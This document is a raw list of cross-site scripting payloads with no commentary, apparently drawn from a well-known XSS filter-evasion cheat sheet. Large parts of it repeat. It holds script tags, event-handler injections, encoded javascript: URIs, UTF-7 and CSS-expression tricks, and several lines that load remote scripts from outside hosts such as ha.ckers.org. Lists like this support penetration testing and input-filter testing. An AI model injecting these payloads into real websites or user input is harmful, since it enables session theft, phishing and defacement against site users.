<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<XSS STYLE="xss:expression(alert('XSS'))">
<XSS STYLE="behavior: url(xss.htc);">
¼script¾alert(¢XSS¢)¼/script¾
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html
base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
<TABLE BACKGROUND="javascript:alert('XSS')">
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\
0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\
0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="width: expression(alert('XSS'));">
<BASE HREF="javascript:alert('XSS');//">
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH
A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv
MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs
aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw
IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh
TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml"
AllowScriptAccess="always"></EMBED>
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>

<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?>
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?
somevariables=maliciouscode">
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7">
</HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT
SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<A HREF="http://66.102.7.147/">XSS</A>
<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A>
<A HREF="http://1113982867/">XSS</A>
<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>
<A HREF="http://0102.0146.0007.00000223/">XSS</A>
<A HREF="htt p://6 6.000146.0x7.147/">XSS</A>
<iframe %00 src="&Tab;javascript:prompt(1)&Tab;"%00>
<svg><style>{font-family&colon;'<iframe/onload=confirm(1)>'
<input/onmouseover="javaSCRIPT&colon;confirm(1)"
<sVg><scRipt %00>alert(1) {Opera}
<img/src=`%00` onerror=this.onerror=confirm(1)
<form><isindex formaction="javascript&colon;confirm(1)"
<img src=`%00`&NewLine; onerror=alert(1)&NewLine;
<script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script>
<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
<iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
<script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/
"><h1/onmouseover='\u0061lert(1)'>%00
<iframe/src="data:text/html,<svg onload=alert(1)>">
<meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-
equiv="refresh"/>
<svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script
<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
<meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
<iframe src=javascript&colon;alert(document&period;location)>
<form><a href="javascript:\u0061lert(1)">X
</script><img/*%00/src="worksinchrome&colon;prompt(1)"/%00*/
onerror='eval(src)'>
<img/	
 src=`~` onerror=prompt(1)>
<form><iframe 	
 src="javascript:alert(1)"
	;>
<a href="data:application/x-x509-user-
cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	
>X<
/a
http://www.google<script .com>alert(document.location)</script
<a href=[]" onmouseover=prompt(1)//">XYZ</a
<img/src=@  onerror = prompt('1')
<style/onload=prompt('XSS')
<script ^__^>alert(String.fromCharCode(49))</script ^__^
</style  ><script   :-(>/**/alert(document.location)/**/</script   :-(
</form><input type="date" onfocus="alert(1)">
<form><textarea  onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'>
<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/
</script /***/
<iframe srcdoc='<body onload=prompt(1)>'>
<a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a>
<script ~~~>alert(0%0)</script ~~~>
<style/onload=
<script src="data:text/javascript,alert(1)"></script>
<iframe/src \/\/onload = prompt(1)
<iframe/onreadystatechange=alert(1)
<svg/onload=alert(1)
<input value=<><iframe/src=javascript:confirm(1)
<input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
http://www.<script>alert(1)</script .com
<iframe
src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&
Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r
&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&
Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&
Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab
;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab
;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab
;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&Ne
wLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&N
ewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Ta
b;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Ta
b;&Tab;&Tab;%29></iframe>
<svg><script ?>alert(1)
<iframe
src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&
Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>
<img src=`xx:xxònerror=alert(1)>
<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
<meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>
<math><a xlink:href="//jsfiddle.net/t846h/">click
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
<svg contentScriptType=text/vbs><script>MsgBox+1
<a href="data:text/html;base64_,<svg/onload=\u0061l&#101%72t(1)>">X</a
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \
u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
<script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script
a=\u0061 & /=%2F
<script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C
%65%72%74(/XSS/)></script
<object data=javascript&colon;\u0061l&#101%72t(1)>
<script>+-+-1-+-+alert(1)</script>
<body/onload=
<script src="data:text/javascript,alert(1)"></script>
<iframe/src \/\/onload = prompt(1)
<iframe/onreadystatechange=alert(1)
<svg/onload=alert(1)
<input value=<><iframe/src=javascript:confirm(1)
<input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
http://www.<script>alert(1)</script .com
<iframe
src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&
Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r
&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&
Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&
Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab
;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab
;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab
;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&Ne
wLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&N
ewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Ta
b;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Ta
b;&Tab;&Tab;%29></iframe>
<svg><script ?>alert(1)
<iframe
src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&
Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>
<img src=`xx:xxònerror=alert(1)>
<meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>
<math><a xlink:href="//jsfiddle.net/t846h/">click
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
<svg contentScriptType=text/vbs><script>MsgBox+1
<a href="data:text/html;base64_,<svg/onload=\u0061l&#101%72t(1)>">X</a
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \
u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
<script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script
a=\u0061 & /=%2F
<script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C
%65%72%74(/XSS/)></script
<object data=javascript&colon;\u0061l&#101%72t(1)>
<script>+-+-1-+-+alert(1)</script>
<body/onload=<!-->&#10alert(1)>
<script itworksinallbrowsers>/*<script* */alert(1)</script
<img src ?itworksonchrome?\/onerror = alert(1)
<svg><script>//&NewLine;confirm(1);</script </svg>
<svg><script onlypossibleinopera:-)> alert(1)
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa
href=j&#97v&#97script:&#97lert(1)>ClickMe
<script x> alert(1) </script 1=2
<div/onmouseover='alert(1)'> style="x:">
<--`<img/src=` onerror=alert(1)> --!>

<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070
&#x074,ale&#x00000072;t(1)></script>
<div style="xg-p:absolute;top:0;left:0;width:100%;height:100%"
onmouseover="prompt(1)" onclick="alert(1)">x</button>
"><img src=x onerror=window.open('https://www.google.com/');>
<form><button formaction=javascript&colon;alert(1)>CLICKME
<math><a xlink:href="//jsfiddle.net/t846h/">click
<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F
%73%63%72%69%70%74%3E"></iframe>
<a
href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#
34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#
108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99
&#114&#105&#112&#116&#62&#8203">Click Me</a>
<SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT>
‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;ale
rt(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–></
SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
<IMG “””><SCRIPT>alert(“XSS”)</SCRIPT>”>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=”jav ascript:alert(‘XSS’);”>
<IMG SRC=”jav	ascript:alert(‘XSS’);”>
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
%253cscript%253ealert(1)%253c/script%253e
“><s”%2b”cript>alert(document.cookie)</script>
foo<script>alert(1)</script>
<scr<script>ipt>alert(1)</scr</script>ipt>
<IMG
SRC=javascript:ale&#
114;t('XSS')>
<IMG
SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112
&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#00
00088&#0000083&#0000083&#0000039&#0000041>
<IMG
SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&
#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
<BODY ONLOAD=alert(‘XSS’)>
<INPUT TYPE=”IMAGE” SRC=”javascript:alert(‘XSS’);”>
<IMG SRC=”javascript:alert(‘XSS’)”
<iframe src=http://ha.ckers.org/scriptlet.html <
javascript:alert("hellox worldss")
<img src="javascript:alert('XSS');">
<img src=javascript:alert("XSS")>
<"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";
alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></
SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
<META HTTP-EQUIV="refresh"
CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH
A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv
MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs
aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw
IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh
TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml"
AllowScriptAccess="always"></EMBED>
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT
SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";
alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></
SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";al
ert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></
SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))<?/
SCRIPT>&submit.x=27&submit.y=9&cmd=search
<script>alert("hellox
worldss")</script>&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510
<script>alert("XSS");</script>&search=1
0&q=';alert(String.fromCharCode(88,83,83))//\';alert%2?
8String.fromCharCode(88,83,83))//";alert(String.fromCharCode?
(88,83,83))//\";alert(String.fromCharCode(88,83,83)%?29//--></
SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83%?2C83))</SCRIPT>&submit-
frmGoogleWeb=Web+Search
<h1><font color=blue>hellox worldss</h1>
<BODY ONLOAD=alert('hellox worldss')>
<input onfocus=write(XSS) autofocus>
<input onblur=write(XSS) autofocus><input autofocus>
<body onscroll=alert(XSS)><br><br><br><br><br><br>...<br><br><br><br><input
autofocus>
<form><button formaction="javascript:alert(XSS)">lol
<img src=x onerror=alert(XSS)//">
<![><img src="]><img src=x onerror=alert(XSS)//">
<style><img src="</style><img src=x onerror=alert(XSS)//">
<? foo="><script>alert(1)</script>">
<! foo="><script>alert(1)</script>">
</ foo="><script>alert(1)</script>">
<? foo="><x foo='?><script>alert(1)</script>'>">
<! foo="[[[Inception]]"><x foo="]foo><script>alert(1)</script>">
<% foo><x foo="%><script>alert(123)</script>">
<div style="font-family:'foo
;color:red;';">LOL
LOL<style>*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/
color:green;color:bl/*IE*/ue;}</style>
<script>({0:#0=alert/#0#/#0#(0)})</script>
<svg xmlns="http://www.w3.org/2000/svg">LOL<script>alert(123)</script></svg>
<SCRIPT>alert(/XSS/.source)</SCRIPT>
\\";alert('XSS');//
</TITLE><SCRIPT>alert(\"XSS\");</SCRIPT>
<INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\">
<BODY BACKGROUND=\"javascript:alert('XSS')\">
<BODY ONLOAD=alert('XSS')>
<IMG DYNSRC=\"javascript:alert('XSS')\">
<IMG LOWSRC=\"javascript:alert('XSS')\">
<BGSOUND SRC=\"javascript:alert('XSS');\">
<BR SIZE=\"&{alert('XSS')}\">
<LAYER SRC=\"http://ha.ckers.org/scriptlet.html\"></
LAYER>
<LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\">
<LINK REL=\"stylesheet\" HREF=\"http://ha.ckers.org/xss.css\">
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<META HTTP-EQUIV=\"Link\"
Content=\"<http://ha.ckers.org/xss.css>; REL=stylesheet\">
<STYLE>BODY{-moz-binding:url(\"http://ha.ckers.org/
xssmoz.xml#xss\")}</STYLE>
<XSS STYLE=\"behavior: url(xss.htc);\">
<STYLE>li {list-style-image:
url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS
<IMG SRC='vbscript:msgbox(\"XSS\")'>
<IMG SRC=\"mocha:[code]\">
<IMG SRC=\"livescript:[code]\">
žscriptualert(EXSSE)ž/scriptu
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">
<META HTTP-EQUIV=\"refresh\"
CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\"&
gt;
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;
URL=http://;URL=javascript:alert('XSS');\"
<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>
<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>
<TABLE BACKGROUND=\"javascript:alert('XSS')\">
<TABLE><TD BACKGROUND=\"javascript:alert('XSS')\">
<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">
<DIV STYLE=\"background-image:\0075\0072\006C\0028'\006a\
0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\
0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029\">
<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">
<DIV STYLE=\"width: expression(alert('XSS'));\">
<STYLE>@im\port'\ja\vasc\ript:alert(\"XSS\")';</STYLE>
<IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\">
<XSS STYLE=\"xss:expression(alert('XSS'))\">
exp/*<A STYLE='no\xss:noxss(\"*//*\");
xss:ex/*XSS*//*/*/pression(alert(\"XSS\"))'>
<STYLE TYPE=\"text/javascript\">alert('XSS');</STYLE>
<STYLE>.XSS{background-
image:url(\"javascript:alert('XSS')\");}</STYLE><A
CLASS=XSS></A>
<STYLE
type=\"text/css\">BODY{background:url(\"javascript:alert('XSS')\")}</
STYLE>

<BASE HREF=\"javascript:alert('XSS');//\">
<OBJECT TYPE=\"text/x-scriptlet\"
DATA=\"http://ha.ckers.org/scriptlet.html\"></OBJECT>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param
name=url value=javascript:alert('XSS')></OBJECT>
<EMBED SRC=\"http://ha.ckers.org/xss.swf\"
AllowScriptAccess=\"always\"></EMBED>
<EMBED SRC=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH
A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv
MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs
aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw
IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh
TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\"
AllowScriptAccess=\"always\"></EMBED>
a=\"get\";
b=\"URL(\\"\";
c=\"javascript:\";
d=\"alert('XSS');\\")\";
eval(a+b+c+d);
<HTML xmlns:xss><?import namespace=\"xss\"
implementation=\"http://ha.ckers.org/xss.htc\"><xss:xss>
XSS</xss:xss></HTML>
<XML ID=I><X><C><![CDATA[<IMG
SRC=\"javas]]><!
[CDATA[cript:alert('XSS');\">]]>
</C></X></xml><SPAN DATASRC=#I DATAFLD=C
DATAFORMATAS=HTML></SPAN>
<XML ID=\"xss\"><I><B><IMG SRC=\"javas
<? echo('<SCR)';
echo('IPT>alert(\"XSS\")</SCRIPT>'); ?>
<IMG SRC=\"http://www.thesiteyouareon.com/somecommand.php?
somevariables=maliciouscode\">
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
<META HTTP-EQUIV=\"Set-Cookie\"
Content=\"USERID=<SCRIPT>alert('XSS')</SCRIPT>\">
<HEAD><META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-
7\"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
<SCRIPT a=\">\"
SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<SCRIPT =\">\"
SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<SCRIPT a=\">\" ''
SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<SCRIPT \"a='>'\"
SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<SCRIPT a=`>`
SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<SCRIPT a=\">'>\"
SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT
SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<A HREF=\"http://66.102.7.147/\">XSS</A>
<A HREF=\"http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\">XSS</A>
<A HREF=\"http://1113982867/\">XSS</A>
<A HREF=\"http://0x42.0x0000066.0x7.0x93/\">XSS</A>
<A HREF=\"http://0102.0146.0007.00000223/\">XSS</A>
<A HREF=\"htt p://6 6.000146.0x7.147/\">XSS</A>
<A HREF=\"//www.google.com/\">XSS</A>
<A HREF=\"//google\">XSS</A>
<A HREF=\"http://ha.ckers.org@google\">XSS</A>
<A HREF=\"http://google:ha.ckers.org\">XSS</A>
<A HREF=\"http://google.com/\">XSS</A>
<A HREF=\"http://www.google.com./\">XSS</A>
<A
HREF=\"javascript:document.location='http://www.google.com/'\"&g
t;XSS</A>
<A
HREF=\"http://www.gohttp://www.google.com/ogle.com/\">XSS&
lt;/A>
<
%3C
&lt
<
&LT
&LT;
&#60
&#060
&#0060
&#00060
&#000060
&#0000060
<
&#x3c
&#x03c
&#x003c
&#x0003c
&#x00003c
&#x000003c
<
<
<
<
<
&#x000003c;
&#X3c
&#X03c
&#X003c
&#X0003c
&#X00003c
&#X000003c
&#X3c;
&#X03c;
&#X003c;
&#X0003c;
&#X00003c;
&#X000003c;
&#x3C
&#x03C
&#x003C
&#x0003C
&#x00003C
&#x000003C
<
<
<
<
<
&#x000003C;
&#X3C
&#X03C
&#X003C
&#X0003C
&#X00003C
&#X000003C
&#X3C;
&#X03C;
&#X003C;
&#X0003C;
&#X00003C;
&#X000003C;
\x3c
\x3C
\u003c
\u003C
<iframe src=http://ha.ckers.org/scriptlet.html>
<IMG SRC=\"javascript:alert('XSS')\"
<SCRIPT SRC=//ha.ckers.org/.js>
<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
<<SCRIPT>alert(\"XSS\");//<</SCRIPT>
<SCRIPT/SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(\"XSS\")>
<SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<IMG SRC=\" javascript:alert('XSS');\">
perl -e 'print \"<SCR\0IPT>alert(\\"XSS\\")</SCR\0IPT>\";' > out
perl -e 'print \"<IMG SRC=java\0script:alert(\\"XSS\\")>\";' > out
<IMG SRC=\"javascript:alert('XSS');\">
<IMG SRC=\"jav
ascript:alert('XSS');\">
<IMG SRC=\"jav	ascript:alert('XSS');\">
<IMG
SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&
#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<IMG
SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112
&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#00
00088&#0000083&#0000083&#0000039&#0000041>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">
<IMG SRC=`javascript:alert(\"RSnake says, 'XSS'\")`>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=\"javascript:alert('XSS');\">
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
'';!--\"<XSS>=&{()}
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83
))//\";alert(String.fromCharCode(88,83,83))//\\";alert(String.fromCharCode(88
,83,83))//--></
SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(88,83,83))</
SCRIPT>
